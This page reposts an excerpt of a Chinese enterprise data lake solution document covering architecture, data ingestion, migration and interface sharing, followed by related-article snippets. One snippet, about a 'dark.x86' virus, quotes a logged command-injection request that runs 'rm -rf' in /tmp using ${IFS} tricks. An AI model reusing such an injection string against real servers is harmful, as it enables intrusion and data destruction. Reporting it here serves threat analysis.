145页企业数字化转型大数据湖项目建设和运营综合解决方案WORD

news2024/9/22 11:37:39

本资料来源公开网络,仅供个人学习,请勿商用。
部分资料内容:

2 需求分析

2.1功能需求

数据湖的应用、管控、展示为一体,提供标准的服务和数据接口和报表展现方式。数据湖数据采用高效,可靠的存储架构。企业业务数据制订迁移方案,将ERP系统、数据采集系统、OA系统、视频监控系统、云商系统中存储的核心数据,整体迁移至数据湖,非弹性资源实行本地化部署,对于弹性计算功能,需与算法数据湖进行协同计算。以实现核心数据可控,消除安全问题和潜在未知风险。支持可视化建模,支持鼠标拖拽方式进行人工智能算法建模。包括数据预处理、特征工程、算法模型、模型评估和部署等功能支持快销业务领域的预测预警等多种类型的算法应用,包括逻辑回归、K近邻、随机森林、朴素贝叶斯、K均值聚类、线性回归、GBDT二分类、GBDT回归等算法模型,也支持深度学习等人工智能训练模型。展示层通过统一的商业BI报表组件,多维度,动态的展示各业务系统的运行状况,资源使用情况等。并支撑周期性或临时性生成各业务状况,决策数据展示,故障分析挖掘等业务场景。


294d4759fd77a2ab1508dcecc8a1f0bf.jpegx x数据湖架构图

文件中心:

主要用于存储各种格式文件,包括影像文件,视频音频文件,PDF,Office文件等类型文件,提供文件级别的全文检索,文 件发布,文件共享,文件提取等功能。提供文件权限管理,版本管理,历史版本恢复等管理功能。

文件中心中文件内容可以经由ETL过程与日志中心,数据中心交换融合数据,共同参与数据处理,数据挖掘,机器学习,影像分析等工作。

日志中心:

收集各类日志数据,物联数据等实时数据,由流处理引擎实时处理数据,确保在第一时间分析处理数据,做到实时监控,  实时告警。

经处理的实时数据可与文件中心,数据中心的数据融合,共同参与数据分析等工作。

结构化数据中心:

实时(或批量)获取数据库或其他介质中的架构化数据,借助Hadoop/Spark等强大的处理能力,高效处理各类数据。

有效结合文件中心,日志中心中的数据共同参与数据分析,数据挖掘。

支持百亿级数据Cube,做到海量数据亚秒级多维度查询。

标准SQL输出接口,支持不断升级的需求以及二次开发。

2.1.1 统一数据接入

85ec8b4e800ce82b4fe270e304aac22d.jpeg                     数据湖接口统一接口示意图

数据接入原则

      1、以应用驱动为主,优先建设高价值数字孪生项目;

      2、入湖数据必须有数据管理部认证,发布对应数据资产标准,匹配对应数据责任人;

      3、数据建模原则以原始数据、清洗整合数据、三范式结构、服务化宽表逐级向上规范;

      4、整体平台需符合高可用、平行扩容原则,符合业务3-5年的数据规划。

数据实时同步,支持绝大多数的数据库实时同步需求。支持跨广域网的数据同步,支持接收器集群。建设统一的,标准的,易于复制和维护的数据实时同步平台,同时完成数据实时同步的技术规范及策略。实现数据同步监控系统,构建数据的更新情况有一个持续的,可靠的实时监控系统。完成一次性数据快速导入与增量数据导入的融合机制——涓流复制。通过Full Dump模块实现数据入库的加密,基于Data Handle提供HiveSQL接口,同时完成数据出库的解密。通过Application Adapter的定制实现数据访问权限的控制

2.1.2 数据迁移

l 将对于频繁读写数据的业务系统,ERP系统、数据采集系统、OA系统、视频监控系统、云商系统保留原数据库的方案。业务数据同步至数据湖,并在并轨运行过程中,需定期验证本地数据湖中与业务系统数据的一致性。

l 接收实时增量数据,按照预定架构存储数据至本地数据湖。生产实时数据实时接入、可靠传输至公司数据库集群中,数据接入量约为110TB/天,历史数据40000TB。

12bc2fadd67a555d1a2cbb7a906a235f.jpeg

数据迁移逻辑架构图

l 数据湖作业分为非弹性和弹性两类,对于非弹性作业在本地数据湖进行运算,对于消耗资源大且需弹性计算作业,采用与企业云进行协同计算,在企业云数据湖中不保存数据,待作业计算完成后将过程和结果数据回传至本地数据湖进行存储。接口服务支持发布订阅模式,支持跨数据湖、跨系统的调用,支持HDFS、Hive、HBase等系统。

a) 接口类型

批量数据封装

将大批量数据按一定条件抽取出来封装成数据资源。批量数据封装必须通过系统进行,不能进行手工操作。

数据请求接口封装

通过restful接口方式将数据封装成访问接口,使访问方通过远程调用对数据进行访问。

b) 接口安全

配置管理

对共享数据的内容和共享接口规则进行配置,包括基础数据配置、共享服务配置、共享权限和共享配置下发。

a)基础数据配置

能够对数据共享功能域中使用到的基础数据进行配置,包括使用共享数据系统的配置、共享数据实体的数据结构和语义描述、共享方式等。

b)共享服务配置

数据服务定义、数据服务目录、数据服务参数配置(如:目标系统、共享方式、数据承载方式、访问频率、访问允许时段)等。

c)共享权限配置

对允许使用共享服务的目标系统进行权限配置,支持共享服务内部具体数据实体和属性的权限配置。

d)共享配置下发

共享数据的内容和共享接口规则下发至各相关系统。

数据共享过程

对各数据共享过程进行监控、异常处理、日志管理,并对数据共享相关的数据提供查询统计和分析功能。

a)表数据共享

目标系统是应用层分析系统,直接开放表访问权限,由目标系统通过ETL进行数据抽取。

b)数据查询

目标系统是应用层分析系统,由目标系统直接通过调用数据湖提供的数据查询服务,完成数据查询。

c)数据订阅

目标系统是应用层分析系统,目标系统提出数据订阅需求,由数据湖提供数据订阅服务。

495d9ff0e5bdeaf29ef0ed281e0e8248.jpeg

2a514a3e9efbb89854e7c45b5223a15b.jpeg

bf3e9bbeea67a7d36741c3021c37636f.jpeg

篇幅有限,无法完全展示,喜欢资料可转发+评论,私信了解更多信息。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/401189.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【0基础学爬虫】爬虫基础之网页基本结构

大数据时代,各行各业对数据采集的需求日益增多,网络爬虫的运用也更为广泛,越来越多的人开始学习网络爬虫这项技术,K哥爬虫此前已经推出不少爬虫进阶、逆向相关文章,为实现从易到难全方位覆盖,特设【0基础学…

不用vdom的lit框架学习1:安装和编译

上一篇文章讲了我们不得不在部分页面将vuepress换用其他框架的原因,这里我们用了一个新的,号称轻量级的lit框架。 主要原因: 1)我们只是部分页面使用,不要要太重的 2)vite默认创建有这个选项…… 我们依…

centos 7下JDK8安装

下载安装包https://www.oracle.com/java/technologies/downloads/#java8-linux上传路径 /usr/local(替换为自己需要安装的路径)解压tar -zxvf jdk-8u131-linux-x64.tar.gz配置环境变量[rootlocalhost java]# vi /etc/profile添加如下配置在配置文件最后&…

C++实现红黑树(RBTree) + 模拟实现map set

目录 一、红黑树(RBTree) 1.1 红黑树概念与性质 1.2 红黑树节点的定义 1.3 红黑树模拟实现 1.3.1 红黑树成员框架 1.3.2 红黑树调整情形 1.3.3 insert() 插入结点 1.3.4 IsBalanceTree() 判断是否为平衡搜索树 二、关联式容器与键值对 2.1 关联式容器概念 2.2 键值对…

python趣味编程-盒子追逐者游戏

在上一期我们用Python实现了一个奥赛罗游戏的游戏,这一期我们继续使用Python实现一个简单的盒子追逐追逐者游戏,让我们开始今天的旅程吧~ 在Python自由源代码中使用Turtle的盒子追逐者游戏 在Python中使用Turtle的盒子追逐者游戏 是一个以 python 程序设…

数据库索引原理

数据库索引的作用是做数据的快速检索,而快速检索实现的本质是数据结构。像二叉树、红黑树、AVL树、B树、B树、哈希等数据结构都可以实现索引,但其中B树效率最高。MySQL数据库索引使用的是B树。二叉树:二叉树中,左子树比根节点小&a…

C++回顾(十六)—— 异常处理机制

16.1 异常的基本语法 1) 若有异常则通过throw操作创建一个异常对象并抛掷。2) 将可能抛出异常的程序段嵌在try块之中。控制通过正常的顺序执行到达try语句,然后执行try块内的保护段。3) 如果在保护段执行期间没有引起异常&#xf…

dark.x86病毒新变种

病毒行为类似https://www.cnblogs.com/wangbingbing/p/15319257.html依然是来自俄罗斯莫斯科的病毒。旧病毒换了个伪装程序查服务器nginx日志发现一个异常请求170.254.229.130 - - [09/Mar/2023:07:19:08 0800] "GET /bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;$…

4个顶级的华为/小米/OPPO/Vivo手机屏幕解锁工具软件

有好几次用户发现自己被锁定在他们的华为/小米/OPPO/Vivo设备之外,我们知道这可能是一种非常可怕的体验。在这种情况下,找到安卓手机解锁软件,重新获得手机中重要数据和文件的访问权限。看看这篇文章,因为我们将与您分享什么是解锁…

DML 添加、修改、删除数据

目录 DML 一、添加数据 1、给指定字段添加数据 2、给全部字段添加数据 3、批量添加数据 二、修改数据 三、删除数据 DML DML英文全称是Data Manipulation Language(数据操作语言),用来对数据库中表的数据记录进行增、删、改操作。 一、添加数据 1、给指定字…

中国人民大学与加拿大女王大学金融硕士——沉淀自己是最好的升华

三毛曾说过:“给自己时间,不要焦虑,一步一步来,一日一日过,请相信生命的韧性是惊人的,跟自己的心去合作,不要放弃对自己的爱护”。当你的能力还驾驭不了你的目标时,你就应该沉下心来…

如何配置用于构建 FastReport Online Designer 的 API ?

FastReport Online Designer 是一个跨平台的报表设计器,允许通过任何平台的移动设备创建和编辑报表。今天我们就一起来看看在2023版中新增和改进的功能有哪些,点击下方可以获取最新版免费试用哦! FastReport Onlin Designe最新版试用https:/…

市场营销的核心是什么?

之所以写下「市场营销的核心是什么?」这篇文章,是因为这几天刚读完了《经理人参阅:市场营销》这本书。作为一个有着近十年工作经验的市场营销从业人员,看完这本书也产生了很多新的想法,也想记录一下,遂成此…

Idea+maven+spring-cloud项目搭建系列--11-2 dubbo鉴权日志记录数据统一封装

前言:使用dubbo做为通信组件,如果接口需要鉴权,和日志记录需要怎样处理; 1 鉴权: 1.1 在bootstrap.yml 中定义过滤器: dubbo.provider.filter: 过滤器的名字: 1.2 resources 目录下创建配置文…

随笔:车辆游戏功能开发-思路

目录1 博客内容2 PS4pro3 功能开发1 博客内容 年初朋友聊天谈到车辆增加G(Game)挡位,适配泛娱乐化功能。均非该领域人员,上月他也离开去无锡,同时该功能涉及悬架、座椅、HUT、音响、转向、线控底盘等多专业人员&#x…

深信服校园招聘安全攻防F卷

1.请尽可能列举你知道的网站未能正确使用图片验证码机制的情况,以及如何绕过其限制? - 图形验证码的内容可OCR识别 - 多阶段的过程,先校验验证码,成功之后的下一步不需要验证码,可以直接抓包,跳过第一步的验…

小诺开源技术

小诺开源技术 文章目录小诺开源技术前言页面演示介绍文档学习建议登录地址下载地址前言 近期接触了小诺开源技术的一个前端框架,底层是蚂蚁框架,感觉很好用,不过需要稍微学习并适应一下,推荐给大家,本篇仅用于学习&am…

人员摔倒识别预警算法 opencv

人员摔倒识别预警算法通过opencv网络模型技术,人员摔倒识别预警算法能够智能检测现场画面中人员有没有摔倒,无需人为干预可以立刻抓拍告警。OpenCV的全称是Open Source Computer Vision Library,是一个跨平台的计算机视觉处理开源软件库&…

C#:Krypton控件使用方法详解(第十四讲) ——kryptonSeparator

今天介绍的Krypton控件中的kryptonSeparator。下面介绍控件的外观属性如下图所示:Cursor属性:表示鼠标移动过该控件的时候,鼠标显示的形状。属性值如下图所示:DrawMoveIndicator属性:表示确定移动分隔符时是否绘制移动…

要不做一名 Prompt Engineer

文章目录1. 什么是 Prompt Engineer2. 如何成为 Prompt Engineer3. Prompt Engineer 需要具备哪些技能4. Prompt Egnineer 适合什么工作岗位5. Prompt Egnineer 未来的发展趋势?6. 哪些公司正在招聘 Prompt Egineer7. Prompt Engineer 必备的20个工具8. Prompt Engi…